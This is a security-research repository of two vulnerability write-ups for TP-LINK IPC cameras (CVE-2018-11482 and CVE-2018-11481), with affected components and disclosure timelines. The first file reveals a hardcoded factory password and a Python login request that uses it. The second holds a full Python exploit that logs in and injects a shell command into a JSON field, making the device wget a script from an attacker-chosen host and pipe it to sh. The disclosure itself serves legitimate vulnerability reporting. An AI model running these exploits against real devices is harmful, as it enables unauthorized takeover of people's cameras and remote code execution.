├── README.md ├── TP-LINK-login-Escalation-of-Privileges └── TP-LINK-websys-Authenticated-RCE /README.md: -------------------------------------------------------------------------------- 1 | # IOT-pwn-for-fun 2 | -------------------------------------------------------------------------------- /TP-LINK-login-Escalation-of-Privileges: -------------------------------------------------------------------------------- 1 | [Suggested description] 2 | /usr/lib/lua/luci/websys.lua on TP-LINK IPC TL-IPC223(P)-6, 3 | TL-IPC323K-D, TL-IPC325(KP)-*, and TL-IPC40A-4 devices has a hardcoded factory 4 | zMiVw8Kw0oxKXL0 password. Nearly All devices on the Internet(more then 10000) can be directly 5 | login success,which lead to escalation of privileges and information disclosure. 6 | 7 | ------------------------------------------ 8 | 9 | [Additional Information] 10 | Hard Coded Password in TP-LINK IPC Camera leading to Escalation of Privileges and Information Disclosure 11 | 12 | ------------------------------------------ 13 | 14 | [Vulnerability Type] 15 | Incorrect Access Control 16 | 17 | ------------------------------------------ 18 | 19 | [Vendor of Product] 20 | TP-LINK 21 | 22 | ------------------------------------------ 23 | 24 | [Affected Product Code Base] 25 | TP-LINK IPC Camera - TL-IPC325(KP)-* 26 | TP-LINK IPC Camera - TL-IPC323K-D * 27 | TP-link IPC Camera - TL-IPC40A-4 * 28 | TP-LINK IPC Camera - TL-IPC223(P)-6 * 29 | 30 | ------------------------------------------ 31 | 32 | [Affected Component] 33 | /usr/lib/lua/luci/websys.lua: 34 | DEFAULT_PWD = "zMiVw8Kw0oxKXL0" 35 | ... 36 | skip 37 | ... 38 | if not e then 39 | return true 40 | end 41 | if e == DEFAULT_PWD then 42 | return true 43 | ... 44 | 45 | ------------------------------------------ 46 | 47 | [Attack Type] 48 | Remote 49 | 50 | ------------------------------------------ 51 | 52 | [Impact Escalation of Privileges] 53 | true 54 | 55 | ------------------------------------------ 56 | 57 | [Impact Information Disclosure] 58 | true 59 | 60 | ------------------------------------------ 61 | 62 | [Attack Vectors] 63 | headers = {"Content-Type":"application/json; charset=UTF-8"} 64 | 65 | r = requests.post("http://%s/"%ip, '{"method":"do","login":{"username":"admin","password":"zMiVw8Kw0oxKXL0"}}', headers = headers) 66 | 67 | ret = json.loads(r.text) 68 | 69 | ------------------------------------------ 70 | 71 | [Reference] 72 | http://service.tp-link.com.cn/detail_download_5471.html(official firmware) 73 | https://www.tp-link.com/us/security 74 | 75 | ------------------------------------------ 76 | 77 | [Discoverer] 78 | dbappsecurity 79 | 80 | [Timeline] 81 | 2018-02-01 Find Vuln. 82 | 2018-02-02 Try to contact TP-Link China ... 83 | 2018-05-24 Failed To contact TP-Link China. 84 | 2018-05-25 Submit to CVE mitre. 85 | 2018-05-26 Got CVE-2018-11482. 86 | 2018-05-28 Make public. -------------------------------------------------------------------------------- /TP-LINK-websys-Authenticated-RCE: -------------------------------------------------------------------------------- 1 | [Suggested description] 2 | TP-LINK IPC TL-IPC223(P)-6, TL-IPC323K-D, TL-IPC325(KP)-*, and 3 | TL-IPC40A-4 devices allow authenticated remote code execution via 4 | crafted JSON data because /usr/lib/lua/luci/torchlight/validator.lua 5 | does not block various punctuation characters. 6 | 7 | ------------------------------------------ 8 | 9 | [VulnerabilityType Other] 10 | RCE 11 | 12 | ------------------------------------------ 13 | 14 | [Vendor of Product] 15 | tp-link 16 | 17 | ------------------------------------------ 18 | 19 | [Affected Product Code Base] 20 | TP-link IPC Camera - TL-IPC325(KP)-* 21 | TP-link IPC Camera - TL-IPC323K-D * 22 | TP-link IPC Camera - TL-IPC40A-4 * 23 | TP-link IPC Camera - TL-IPC223(P)-6 * 24 | 25 | ------------------------------------------ 26 | 27 | [Affected Component] 28 | /usr/lib/lua/luci/torchlight/validator.lua: 29 | .... 30 | local e = "^[%a%d%p]+@[%w%d%-]+%." 31 | if not n:match(e)then 32 | .... 33 | 34 | %p is not strict enough, allows ',",},{, to RCE 35 | 36 | ------------------------------------------ 37 | 38 | [Attack Type] 39 | Remote 40 | 41 | ------------------------------------------ 42 | 43 | [Impact Code execution] 44 | true 45 | 46 | ------------------------------------------ 47 | 48 | [Attack Vectors] 49 | #!/usr/bin/env python 50 | # encoding: utf-8 51 | 52 | import sys 53 | import json 54 | import requests 55 | 56 | if len(sys.argv) != 3: 57 | print "python z.py [TargetIp] [ReverseIP]" 58 | exit(1) 59 | ip = sys.argv[1] 60 | reverse_ip = sys.argv[2] 61 | headers = {"Content-Type":"application/json; charset=UTF-8"} 62 | r = requests.post("http://%s/"%ip, '{"method":"do","login":{"username":"admin","password":"WaQ7x6b09TefbwK", "WHQVQbhc9TefbwK":""}}', headers = headers) 63 | ret = json.loads(r.text) 64 | stok = ret['stok'] 65 | url = "http://%s/stok=%s/ds"%(ip, stok) 66 | data = """{"cloud_config":{"bind":{"username":"testtest@qq.com","password":"'};wget$IFS-qO-$IFS'http://%s/z'|sh;{'"}},"method":"do"}""" %reverse_ip 67 | 68 | r = requests.post(url, data, headers = headers).text 69 | if "0" in r: 70 | print "Success." 71 | elif "-51219" in r: 72 | print "You need reboot target device." 73 | elif "-40401" in r: 74 | print "Bypass Auth Failed" 75 | else: 76 | print "Emmm." 77 | 78 | ------------------------------------------ 79 | 80 | [Reference] 81 | http://security.tp-link.com.cn/ 82 | http://service.tp-link.com.cn/detail_download_5471.html(official firmware) 83 | https://www.tp-link.com/us/security 84 | 85 | ------------------------------------------ 86 | 87 | [Discoverer] 88 | dbappsecurity 89 | 90 | [Timeline] 91 | 2018-02-01 Find Vuln. 92 | 2018-02-02 Try to contact TP-Link China ... 93 | 2018-05-24 Failed To contact TP-Link China. 94 | 2018-05-25 Submit to CVE mitre. 95 | 2018-05-26 Got CVE-2018-11481. 96 | 2018-05-28 Make public. 97 | 98 | 99 | --------------------------------------------------------------------------------